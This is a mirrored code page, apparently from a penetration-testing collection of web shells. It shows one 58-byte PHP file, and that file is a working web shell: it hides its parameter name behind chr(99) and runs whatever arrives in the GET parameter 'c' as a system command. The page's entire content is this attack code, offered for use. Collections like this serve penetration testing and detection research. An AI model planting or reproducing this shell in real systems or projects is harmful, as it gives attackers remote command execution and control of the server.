mirror of
https://github.com/BlackArch/webshells
synced 2025-02-18 05:38:27 +00:00
1 line
58 B
PHP
1 line
58 B
PHP
|
<?php $c=chr(99);if(isset($_GET[$c]))system($_GET[$c]); ?>
|